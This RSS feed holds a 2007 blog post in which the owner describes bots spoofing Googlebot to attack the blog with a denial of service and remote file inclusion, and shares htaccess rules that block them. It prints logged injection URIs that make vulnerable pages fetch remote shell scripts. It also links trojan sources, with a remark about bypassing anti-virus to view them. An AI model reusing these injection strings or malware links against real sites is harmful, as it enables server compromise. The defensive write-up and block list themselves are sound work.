<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; PHP+Rst.S</title>
	<atom:link href="http://42.kaizeku.com/taxonomy/phprsts//feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#38; Trojan</title>
		<link>http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/</link>
		<comments>http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/#comments</comments>
		<pubDate>Fri, 21 Dec 2007 22:48:35 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[Amidalla]]></category>

		<category><![CDATA[libwww-perl]]></category>

		<category><![CDATA[owned]]></category>

		<category><![CDATA[packet spoofing]]></category>

		<category><![CDATA[PHP+Rst.S]]></category>

		<category><![CDATA[ShellBot.B]]></category>

		<category><![CDATA[Trojan]]></category>

		<category><![CDATA[wp]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/</guid>
		<description><![CDATA[<img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg' class="fl" alt='cat owned' longdesc="http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg"/>For this past three days this blog is suffering DOS attack . The attack is still alive now I don't think they will leave yet.

I cant banned this bot directly as they were sending <strong>forge packet</strong> (packet spoofing) as <strong>googlebot </strong> http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.
<pre class="prebox cl" style="height:100px">
OrgName:    Google Inc.
OrgID:      GOGL
Address:    1600 Amphitheatre Parkway
City:       Mountain View
StateProv:  CA
PostalCode: 94043
Country:    US
</pre>

<p class="padbox" style="background-color:#ffd">At the time being I blocked all remote streams from their random host *.com and "perl bot signature" but blocking will not stop them from hammering this site. I'll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later. </p>

<h2 class="sep">Type of injections</h2>
There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src="http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg" class="fl" alt="cat owned" longdesc="http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg" />For this past three days this blog is suffering DOS attack . The attack is still alive now I don&#8217;t think they will leave yet.</p>
<p>I cant banned this bot directly as they were sending <strong>forge packet</strong> (packet spoofing) as <strong>googlebot </strong> http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.</p>
<pre class="prebox cl" style="height: 100px">
OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US</pre>
<p><span id="more-103"></span></p>
<p class="padbox notice">At the time being I blocked all remote streams from their random host *.com and &#8220;perl bot signature&#8221; but blocking will not stop them from hammering this site. I&#8217;ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.</p>
<h2 class="sep">Type of injections</h2>
<p>There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.</p>
<pre class="prebox">
/es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja
 gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?</pre>
<p>To view the following source you need to exclude the website host from your anti-virus program.</p>
<ul>
<li> <strong>Perl/ShellBot.B trojan</strong> - http://hom3.t35.com/xpl/fidz/hack/bnc.txt</li>
<li> <strong>PHP/Rst.S Trojan</strong> - http://hom3.t35.com/xpl/fidz</li>
</ul>
<h2 class="cb">htaccess blocked bad Code Injector and Perl Bot (Botnet)</h2>
<p>If you has similar problems. you should block the following domain in your htaccess.<br />
mod_setenvif</p>
<pre class="prebox">
SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1
SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1

&lt;FilesMatch "(.*)"&gt;
Order Allow,Deny
Allow from all
Deny from env=codeinjector_ref
Deny from env=shell_bots
&lt;/FilesMatch&gt;
</pre>
<p>if u arent sure if you server support mod_setenvif wrap it like the below example.</p>
<pre>
&lt;IfModule mod_setenvif.c&gt;
#...replace this line with the above code...
&lt;/IfModule&gt;</pre>
<h2 class="sep">How to trap Perl Shell Bot</h2>
<p>We need a pattern to trap this bots. certainly we knew that these bots :</p>
<ul>
<li>doesn&#8217;t honor robot.txt</li>
<li>they crawl all subdirectory</li>
<li>they has a pattern URI request</li>
</ul>
<p>For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. alexa bot will be banned too as they dont honor robot.txt.</p>
<p>I&#8217;ll be updating this post from time to time. Do check the related articles on how to packet spoofing and validating forge/spoof packet.</p>
<h2 class="sep">Recent Scan &amp; Update</h2>
<p>The below list is automatically added.</p>
<dl id="code-injections" class="xoxo cf">
<dt class="title" style="border-top: 1px solid #eeeeee; padding: 3px 0pt; margin-top: 4px">December 24, 2007</dt>
<dd>ip: <tt>64.26.63.10</tt> param: <tt>login=</tt>,<tt>?</tt> inject: <tt>http://pawang.in/r57.txt</tt></dd>
<dt class="title" style="border-top: 1px solid #eeeeee; padding: 3px 0pt; margin-top: 4px">December 24, 2007</dt>
<dd>ip: <tt>64.26.63.10</tt> param: <tt>dir=</tt>,<tt>login=</tt> inject: <tt>http://pawang.in/r57.txt????</tt></dd>
<dt class="title" style="border-top: 1px solid #eeeeee; padding: 3px 0pt; margin-top: 4px">December 25, 2007</dt>
<dd>ip: <tt>59.158.128.138</tt> param: <tt>p=</tt>,<tt>:allinurl=</tt> inject: <tt>http://gw-gold.net/jpg/pictures/test.txt</tt></dd>
</dl>
<h2 class="sep">External Resources</h2>
<ul>
<li><a href="http://www.wireshark.org">Packet spoofing - http://www.wireshark.org</a></li>
<li><a href="http://www.eff.org/testyourisp/pcapdiff/">pcapdiff validate forged packet http://www.eff.org/testyourisp/pcapdiff/</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
